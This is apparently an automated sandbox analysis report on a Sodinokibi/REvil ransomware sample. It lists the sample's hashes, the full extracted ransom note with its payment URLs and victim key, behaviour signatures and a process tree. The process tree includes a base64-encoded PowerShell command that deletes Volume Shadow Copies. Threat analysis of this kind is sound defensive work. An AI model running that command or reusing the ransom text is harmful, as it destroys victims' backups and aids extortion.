Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    03-05-2021 18:04

General

  • Target

    329b7965_by_Libranalysis.exe

  • Size

    182KB

  • MD5

    329b796513db794d0548843d5e919a1e

  • SHA1

    7979369952d9ed389bbbc598a3899db552994a1f

  • SHA256

    0a471df64b677fd6608c72626444d22381f7fc20ea0165cc5b88fdad0402d32f

  • SHA512

    fbc1b279712ed01758ae346bf9119e3d81dd705530d664f3888a811febf6a7833183aece36cdb2b3384bb24a59eaabce129649ee866ddf812ba9caaa57ef45e0

Malware Config

Extracted

Path

C:\81bpm4h2bi-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 81bpm4h2bi. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9E5BFB7F58E30588 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/9E5BFB7F58E30588 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: vlLRBEeGcEJ+AffPX/cmhEAQRGtbFcZJpxxZ6IH2h+vmSl2oWheJ2uyXoyYtMsW+ R/4fv0Hh1qypwRWpY9fH42Y/K8ubFOOBdUkX2UdMi7zpa5o+MvykJHGknfkkdd+u djaU/tmycY0nCuBxfPt4wr7VcalRS6Lg1xkUSDy1pGUdefMAfe4g/TUcPKZUwcEQ MrD68wvO8yvKiCd61lBcKS1WSetf3XKMztCNYnAKJFZ8Iq4JWr0Cays4aDC/E++w CdKauqI/N/+9+BfsEU2WwppHPJfetieMLZQPlBONM9aDctxtpCYojcEnpheD8Fss yudq7aQrupWBN7RiZhf942H26HGPEC1f+paI5MmYwe5Y0TsIYsOgJ52u/0BsoCbF N8MeRHCs9uiuoAKAJQ5/LKM7QBTUAFL7pxi/zBE0WLYOoEA3DIEVvyZq8UtmFVrL bO1NmnbuCFnjQNjQZtAv0xwr4TxYhSFU6nVvzjUWYRM3kxmXlxEL00+SsLzhPi1G lGT4k+SGje2T6S5ko81LQmPu5UBJ/Suje7B6Xzc3jd1PdMEFESvZSSlxiiCg9VMh X1NT6ZfUoK5w9MCHD+OK34ERSJuOrzasJo2OUz7vGsKrqiCKEsthGK0MDi1sYLjR h19l74B3jMamVSMfPUK3B1onUqzEJT9SfcrDzpzzyiYv8rreEw++9Tlr/f1ZcOEo JNKFQVeMlgm7MvFOV1iqxyx0e8ihmqZjbd+rasBleTxTKAZ2U5C7KS7tINGgRxVb 8M+QaghVRbmzV2f3j6gpNlCSfmlb4tZlZT9IqNrFObSCIGaovrQFgjIYHn/F2Q8r zhqty5M3AQzV8h/K+CEShmZWTo0eydsVCro6b3mVveaTx8hVMO1bIPS9ShisQHNX HJejCOAsKasaldjiYikMxi/xYPqVzpfa2piheiiJM6ZSZWlGUnjTwz9dy/oGpbjl ONcjXSthnLtLkHRqDXXpf42SWD22oDhukRyTx2fy8rPmKdeRTze3vhPsyrtslH13 cm1gLM5WuvtYRJPnW4gCj4VlhGwxx0Kcn1KEUF6xvBrslK/0kogjkCywyqGBgnhE qgTwQqZPiVbgspgmgwm5zIKsigGsZVabcvTCn+YpjS9CdE085KlAsfyABCx28Zt+ 41lYi5J7Dl9ffwJv57fP/DFmjrEyOkSDDCO1ZDZo2JsdUIa1P10i7ZVlUHWlcrlb wz0cUp4NTEnLoJzdVOE6dglzkVRr6MDdBxwJmlg3prPPFANniYyiV6BwdK4UiJpi SLczJlrDbKSLcWSBlA59Ghbd5F9/ZSA+ ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9E5BFB7F58E30588

http://decryptor.cc/9E5BFB7F58E30588

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 27 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\329b7965_by_Libranalysis.exe
    "C:\Users\Admin\AppData\Local\Temp\329b7965_by_Libranalysis.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1892
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2572
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2564
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3400

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2572-114-0x0000000000000000-mapping.dmp
    • memory/2572-120-0x000001BBC2BA0000-0x000001BBC2BA1000-memory.dmp
      Filesize

      4KB

    • memory/2572-124-0x000001BBC4E30000-0x000001BBC4E31000-memory.dmp
      Filesize

      4KB

    • memory/2572-129-0x000001BBC2C50000-0x000001BBC2C52000-memory.dmp
      Filesize

      8KB

    • memory/2572-130-0x000001BBC2C53000-0x000001BBC2C55000-memory.dmp
      Filesize

      8KB

    • memory/2572-136-0x000001BBC2C56000-0x000001BBC2C58000-memory.dmp
      Filesize

      8KB